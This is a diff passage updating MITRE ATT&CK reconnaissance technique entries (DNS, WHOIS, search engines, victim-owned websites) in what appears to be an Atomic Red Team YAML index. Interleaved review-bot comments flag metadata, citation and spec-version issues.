description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:05.302Z'
name: IP Addresses
description: |-
Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -55212,33 +55885,33 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.002:
technique:
- modified: '2022-10-21T14:32:48.393Z'
+ modified: '2024-11-11T16:13:02.196Z'
name: DNS
description: |-
- Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+ Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
created: '2020-10-02T15:47:10.102Z'
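Review bot: the new AXFR paragraph changes what the unchanged detection text can honestly claim about visibility. The detection block still says this activity may "take place outside the visibility of the target organization", which holds for passive DNS lookups but not for zone transfers: an AXFR request has to be sent to the victim's own authoritative name servers, so refused or answered transfer requests are loggable there, and restricting which hosts may transfer a zone is the direct mitigation. That is the defender-side artifact an atomic test for this sub-technique should name. The "DNS, MX, TXT" to "DNS MX, TXT" change in the first paragraph is a correct wording fix, and the `x_mitre_version` bump '1.1' to '1.2' plus the contributor move are consistent with the edit.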
@@ -55252,18 +55925,29 @@ reconnaissance:
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
url: https://www.circl.lu/services/passive-dns/
+ - source_name: DNS-CISA
+ description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+ Leak Domain Information. Retrieved June 5, 2024.
+ url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
- source_name: DNS Dumpster
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
url: https://dnsdumpster.com/
+ - source_name: Alexa-dns
+ description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+ June 5, 2024.
+ url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
- source_name: Sean Metcalf Twitter DNS Records
description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
- May 27, 2022.
- url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+ September 12, 2024.
+ url: https://x.com/PyroTek3/status/1126487227712921600
+ - source_name: Trails-DNS
+ description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+ the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+ url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.002:
technique:
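Review bot: the added DNS-CISA reference is internally inconsistent, its description is dated (2016, September 29) while the URL path contains 2015/04/13. The Alexa-dns entry also has no author and starts directly with the title, unlike every other entry in the list, and the Sean Metcalf reference changes domain from twitter.com to x.com and drops the trailing /photo/1 path segment along with the new retrieval date. All of this comes from upstream ATT&CK and should be corrected there rather than here; on the side that matters for this file, the three Citation tokens used in the new description paragraph (Trails-DNS, DNS-CISA, Alexa-dns) all resolve to an entry in this list.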
@@ -55284,7 +55968,7 @@ reconnaissance:
- source_name: WHOIS
url: https://www.whois.net/
description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:50:44.113Z'
name: WHOIS
description: |-
Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -55300,39 +55984,37 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1594:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
- type: attack-pattern
- created: '2020-10-02T16:51:50.306Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1594
- url: https://attack.mitre.org/techniques/T1594
- - source_name: Comparitech Leak
- url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
- description: Bischoff, P. (2020, October 15). Broadvoice database of more
- than 350 million customer records exposed online. Retrieved October 20,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-02T18:52:21.278Z'
name: Search Victim-Owned Websites
- description: |-
- Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
- Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+ description: "Adversaries may search websites owned by the victim for information
+ that can be used during targeting. Victim-owned websites may contain a variety
+ of details, including names of departments/divisions, physical locations,
+ and data about key employees such as names, roles, and contact info (ex: [Email
+ Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+ also have details highlighting business operations and relationships.(Citation:
+ Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+ actionable information. Information from these sources may reveal opportunities
+ for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+ or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+ establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+ or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+ initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+ or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+ to manually browsing the website, adversaries may attempt to identify hidden
+ directories or files that could contain additional sensitive information or
+ vulnerable functionality. They may do this through automated activities such
+ as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+ well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+ Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - James P Callahan, Professional Paranoid
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for suspicious network traffic that could be indicative
of adversary reconnaissance, such as rapid successions of requests indicative
of web crawling and/or large quantities of requests originating from a single
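Review bot: the T1594 description switches from the `|-` literal block used by every other description in this file to a double-quoted scalar with embedded `\n\n`, and there is a trailing space after "(Citation: Register Robots TXT 2015)" before the closing quote. That trailing space is most likely what made the YAML emitter fall back to quoting (PyYAML refuses block style for a scalar with trailing whitespace), and the quoted form is far harder to read and diff. Stripping trailing whitespace from description fields in the generator before dumping would preserve the block style and reduce the actual content change (the new paragraph on sitemap.xml and robots.txt) to a few-line diff. The two new Citation tokens are added to external_references in the next hunk.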
@@ -55340,13 +56022,41 @@ reconnaissance:
Analyzing web metadata may also reveal artifacts that can be attributed to
potentially malicious activity, such as referer or user-agent string HTTP/S
fields.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+ created: '2020-10-02T16:51:50.306Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1594
+ external_id: T1594
+ - source_name: Perez Sitemap XML 2023
+ description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+ to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+ 2024.
+ url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+ - source_name: Comparitech Leak
+ description: Bischoff, P. (2020, October 15). Broadvoice database of more
+ than 350 million customer records exposed online. Retrieved October 20,
+ 2020.
+ url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+ - source_name: Register Robots TXT 2015
+ description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+ you don't want them to look. Retrieved July 18, 2024.
+ url: https://www.theregister.com/2015/05/19/robotstxt/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.001:
technique:
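Review bot: `spec_version: '2.1'` is dropped from the T1594 object here (and from every other object touched in this file) while `x_mitre_attack_spec_version` moves to 3.2.0. spec_version is a required common property on STIX 2.1 objects, so anything downstream that validates these technique blocks as STIX will start failing on them; if the generator deliberately stopped emitting the field, a sentence in the PR description saying so would save the next reviewer the same question.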
@@ -55371,7 +56081,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:13.409Z'
name: DNS/Passive DNS
description: |-
Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
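Review bot: `modified` moves backwards here, from 2022-04-25T14:00:00.188Z to 2021-04-15T03:49:13.409Z, and the same regression repeats on most of the T159x objects further down (T1591.003, T1592.001, T1590.004, T1590.003, T1597.001, T1595, T1590.006, T1591.002, T1592.004, T1596.004, T1591, T1590), while T1598.003, T1589, T1593.002, T1589.003 and T1598.002 jump forward to 2024 dates. A refresh should never move modified earlier, so confirm the generator pulled every object from the same current ATT&CK STIX export rather than mixing an older bundle in; anything that diffs on modified will otherwise treat these as stale.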
@@ -55387,8 +56097,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.003:
technique:
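Review bot: this hunk deletes `x_mitre_attack_spec_version: 2.1.0` from T1596.001 and nothing in the hunk re-adds it, whereas T1594 two hunks up gains `x_mitre_attack_spec_version: 3.2.0`. The same net loss recurs on the other objects whose `modified` falls back to 2021 (T1591.003, T1590.004, T1590.003, T1597.001, T1590.006, T1591.002, T1596.004, T1591, T1590). If the field is now genuinely absent from those objects, any consumer that reads it will hit a missing key on a subset of the reconnaissance techniques; either re-add it from the current export or state in the PR that the field is optional.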
@@ -55410,7 +56118,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:38:31.983Z'
name: Identify Business Tempo
description: |-
Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -55426,8 +56134,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.001:
technique:
@@ -55453,7 +56159,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:32:10.810Z'
name: 'Gather Victim Host Information: Hardware'
description: |-
Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -55471,13 +56177,11 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1592.001
atomic_tests: []
T1598.003:
technique:
- modified: '2024-04-19T13:26:16.082Z'
+ modified: '2024-05-31T04:18:44.567Z'
name: Spearphishing Link
description: |-
Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -55533,7 +56237,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: TrendMictro Phishing
description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
October 20, 2020.
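Review bot: the ACSC Email Spoofing reference swaps the original cyber.gov.au URL for a web.archive.org snapshot (good) but leaves the description at `Retrieved October 19, 2020`, whereas the OPM Leak reference further down updates both the URL and the retrieved date when it moves to the archive. Be consistent: either bump the retrieved date here too (and in the T1598.002 copy of the same reference below), or leave the OPM date alone; if this is regenerated from upstream ATT&CK data, the inconsistency lives there and is worth reporting rather than hand-editing.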
@@ -55584,7 +56288,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.004:
technique:
@@ -55605,7 +56308,7 @@ reconnaissance:
- source_name: DNS Dumpster
url: https://dnsdumpster.com/
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:33:02.476Z'
name: Network Topology
description: |-
Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -55621,8 +56324,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.003:
technique:
@@ -55644,7 +56345,7 @@ reconnaissance:
url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
description: García, C. (2019, April 3). Pentesting Active Directory Forests.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:22.917Z'
name: Network Trust Dependencies
description: |-
Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -55660,8 +56361,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.001:
technique:
@@ -55683,7 +56382,7 @@ reconnaissance:
url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
Intelligence Feeds. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:45:30.862Z'
name: Threat Intel Vendors
description: |-
Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -55699,12 +56398,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589:
technique:
- modified: '2024-04-19T04:27:00.005Z'
+ modified: '2024-09-16T16:09:45.794Z'
name: Gather Victim Identity Information
description: |-
Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -55744,8 +56441,8 @@ reconnaissance:
external_id: T1589
- source_name: OPM Leak
description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- source_name: Detectify Slack Tokens
description: Detectify. (2016, April 28). Slack bot token leakage exposing
business critical information. Retrieved October 19, 2020.
@@ -55790,11 +56487,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:37:31.317Z'
name: Vulnerability Scanning
description: |-
Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -55834,9 +56530,8 @@ reconnaissance:
url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596:
technique:
@@ -55898,7 +56593,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595:
technique:
@@ -55924,7 +56618,7 @@ reconnaissance:
url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
October 20, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T20:58:13.661Z'
name: Active Scanning
description: |-
Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -55945,8 +56639,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.002:
technique:
@@ -56011,7 +56703,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1598.004:
technique:
@@ -56059,7 +56750,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.006:
technique:
@@ -56081,7 +56771,7 @@ reconnaissance:
url: https://nmap.org/book/firewalls.html
description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
and Intrusion Detection Systems. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:54.275Z'
name: Network Security Appliances
description: |-
Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -56097,34 +56787,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
- type: attack-pattern
- created: '2020-10-02T16:50:12.809Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1593.002
- url: https://attack.mitre.org/techniques/T1593/002
- - source_name: SecurityTrails Google Hacking
- url: https://securitytrails.com/blog/google-hacking-techniques
- description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- - source_name: ExploitDB GoogleHacking
- url: https://www.exploit-db.com/google-hacking-database
- description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
- October 23, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T19:19:47.758Z'
name: Search Engines
description: |-
Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
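Review bot: almost all of this hunk is key reordering rather than content: x_mitre_platforms, x_mitre_domains, object_marking_refs, id, type, created, created_by_ref and external_references are removed from the head of the T1593.002 object only to reappear after x_mitre_version in the next hunk, and the same shuffle happens for T1589.003, T1598.002 and T1597 below. The only substantive change in this hunk is `modified`. Having the generator emit keys in a fixed order would keep these diffs down to the real changes and make the reference URL swaps much easier to spot in review.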
@@ -56133,15 +56799,38 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+ created: '2020-10-02T16:50:12.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1593/002
+ external_id: T1593.002
+ - source_name: SecurityTrails Google Hacking
+ description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+ - source_name: ExploitDB GoogleHacking
+ description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+ October 23, 2020.
+ url: https://www.exploit-db.com/google-hacking-database
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.002:
technique:
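Review bot: the `SecurityTrails Google Hacking` reference now points at https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks while its description still cites Borges, E. (2019, March 5), Exploring Google Hacking Techniques. The new slug reads like a general google-dorks explainer rather than that article, so confirm it is the same content (or a redirect of it) before accepting the retrieved-date bump to September 12, 2024. Keep `source_name` unchanged in any case, since the description text cites it as (Citation: SecurityTrails Google Hacking); the same URL swap appears again on T1593 further down.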
@@ -56163,7 +56852,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:36:58.964Z'
name: Business Relationships
description: |-
Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -56179,8 +56868,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
